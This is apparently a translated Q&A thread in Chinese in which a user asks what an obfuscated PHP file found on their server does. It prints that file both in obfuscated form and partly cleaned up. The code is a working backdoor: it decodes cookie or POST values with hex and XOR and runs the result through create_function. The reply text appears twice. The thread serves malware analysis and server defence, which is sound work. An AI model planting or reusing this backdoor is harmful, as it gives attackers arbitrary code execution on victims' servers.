解除PHP攻击_Php_Security_Deobfuscation

解除PHP攻击

php security

解除PHP攻击,php,security,deobfuscation,Php,Security,Deobfuscation,我在虚拟服务器上发现了一个文件，我很好奇它是什么。我确信这是恶意的，但不确定是什么被破坏了，或者他们能用它做多少。我以前见过其他提供完整数据库和文件访问的系统，但这与以前有很大不同。我已经尽我所能地去清洗它了。以下是简单的版本： <?php $auuhct = Array("create_function", "f70414e8-ea6a-4e12-b964-368b7762b896","H*", "#",

我在虚拟服务器上发现了一个文件，我很好奇它是什么。我确信这是恶意的，但不确定是什么被破坏了，或者他们能用它做多少。我以前见过其他提供完整数据库和文件访问的系统，但这与以前有很大不同。我已经尽我所能地去清洗它了。以下是简单的版本：

<?php

$auuhct = Array("create_function", "f70414e8-ea6a-4e12-b964-368b7762b896","H*", "#", "count", "str_repeat", "explode","substr","array_merge","strlen","pack"  );

foreach (array_merge($_COOKIE, $_POST) as $key => $value){
    function jybgy($auuhct, $key, $lcprx){
        return substr(str_repeat($key . "f70414e8-ea6a-4e12-b964-368b7762b896", ($lcprx / strlen($key)) + 1), 0, $lcprx);
    }
    function mgfug($auuhct, $opazmvt){
        return @pack("H*", $opazmvt);
    }
    function wvckbs($auuhct, $opazmvt){
        $gtatuki = count($opazmvt) % 3;
        if (!$gtatuki) {
             $pemcz = create_function("", $opazmvt[1]($opazmvt[2]));
            $pemcz();
            exit();
        }
    }
    $value = mgfug($auuhct, $value);
wvckbs($auuhct, explode("#", $value ^ jybgy($auuhct, $key, strlen($value))));
}

尽管特定的恶意软件可能很有趣，但您首先需要解决的主要问题是阻止它们出现在服务器上。只要人们能把可执行文件放在那里，一个特定的文件到底做了什么其实并不那么重要。我完全同意，但我确实喜欢黑客将大量功能塞进价值2千个模糊代码中的能力。了解正在发生的事情有助于我在自己的项目上做得更多，也能更好地确保事情的安全。我认为这是一个糟糕的wordpress插件。尽管特定的恶意软件可能很有趣，但您需要解决的主要问题是首先阻止它们出现在服务器上。只要人们能把可执行文件放在那里，一个特定的文件到底做了什么其实并不那么重要。我完全同意，但我确实喜欢黑客将大量功能塞进价值2千个模糊代码中的能力。了解正在发生的事情有助于我在自己的项目上做得更多，也能更好地确保事情的安全。我想这是一个糟糕的wordpress插件。
<?php
$iwfxvw = 'fHc*4v0d283_s\'-ta91lp7gkibermo#uny6x';

$auuhct = Array();

$auuhct[] = $iwfxvw[2] . $iwfxvw[27] . $iwfxvw[26] . $iwfxvw[16] . $iwfxvw[15] . $iwfxvw[26] . $iwfxvw[11] . $iwfxvw[0] . $iwfxvw[31] . $iwfxvw[32] . $iwfxvw[2] . $iwfxvw[15] . $iwfxvw[24] . $iwfxvw[29] . $iwfxvw[32];
$auuhct[] = $iwfxvw[0] . $iwfxvw[21] . $iwfxvw[6] . $iwfxvw[4] . $iwfxvw[18] . $iwfxvw[4] . $iwfxvw[26] . $iwfxvw[9] . $iwfxvw[14] . $iwfxvw[26] . $iwfxvw[16] . $iwfxvw[34] . $iwfxvw[16] . $iwfxvw[14] . $iwfxvw[4] . $iwfxvw[26] . $iwfxvw[18] . $iwfxvw[8] . $iwfxvw[14] . $iwfxvw[25] . $iwfxvw[17] . $iwfxvw[34] . $iwfxvw[4] . $iwfxvw[14] . $iwfxvw[10] . $iwfxvw[34] . $iwfxvw[9] . $iwfxvw[25] . $iwfxvw[21] . $iwfxvw[21] . $iwfxvw[34] . $iwfxvw[8] . $iwfxvw[25] . $iwfxvw[9] . $iwfxvw[17] . $iwfxvw[34];
$auuhct[] = $iwfxvw[1] . $iwfxvw[3];
$auuhct[] = $iwfxvw[30];
$auuhct[] = $iwfxvw[2] . $iwfxvw[29] . $iwfxvw[31] . $iwfxvw[32] . $iwfxvw[15];
$auuhct[] = $iwfxvw[12] . $iwfxvw[15] . $iwfxvw[27] . $iwfxvw[11] . $iwfxvw[27] . $iwfxvw[26] . $iwfxvw[20] . $iwfxvw[26] . $iwfxvw[16] . $iwfxvw[15];
$auuhct[] = $iwfxvw[26] . $iwfxvw[35] . $iwfxvw[20] . $iwfxvw[19] . $iwfxvw[29] . $iwfxvw[7] . $iwfxvw[26];
$auuhct[] = $iwfxvw[12] . $iwfxvw[31] . $iwfxvw[25] . $iwfxvw[12] . $iwfxvw[15] . $iwfxvw[27];
$auuhct[] = $iwfxvw[16] . $iwfxvw[27] . $iwfxvw[27] . $iwfxvw[16] . $iwfxvw[33] . $iwfxvw[11] . $iwfxvw[28] . $iwfxvw[26] . $iwfxvw[27] . $iwfxvw[22] . $iwfxvw[26];
$auuhct[] = $iwfxvw[12] . $iwfxvw[15] . $iwfxvw[27] . $iwfxvw[19] . $iwfxvw[26] . $iwfxvw[32];
$auuhct[] = $iwfxvw[20] . $iwfxvw[16] . $iwfxvw[2] . $iwfxvw[23];
foreach ($auuhct[8]($_COOKIE, $_POST) as $lfwzp => $mdvvnjb)
{
    function jybgy($auuhct, $lfwzp, $lcprx)
    {
        return $auuhct[7]($auuhct[5]($lfwzp . $auuhct[1], ($lcprx / $auuhct[9]($lfwzp)) + 1) , 0, $lcprx);
    }
    function mgfug($auuhct, $opazmvt)
    {
        return @$auuhct[10]($auuhct[2], $opazmvt);
    }
    function wvckbs($auuhct, $opazmvt)
    {
        $gtatuki = $auuhct[4]($opazmvt) % 3;
        if (!$gtatuki)
        {
            $heemr = $auuhct[0];
            $pemcz = $heemr("", $opazmvt[1]($opazmvt[2]));
            $pemcz();
            exit();
        }
    }
    $mdvvnjb = mgfug($auuhct, $mdvvnjb);
    wvckbs($auuhct, $auuhct[6]($auuhct[3], $mdvvnjb ^ jybgy($auuhct, $lfwzp, $auuhct[9]($mdvvnjb))));
}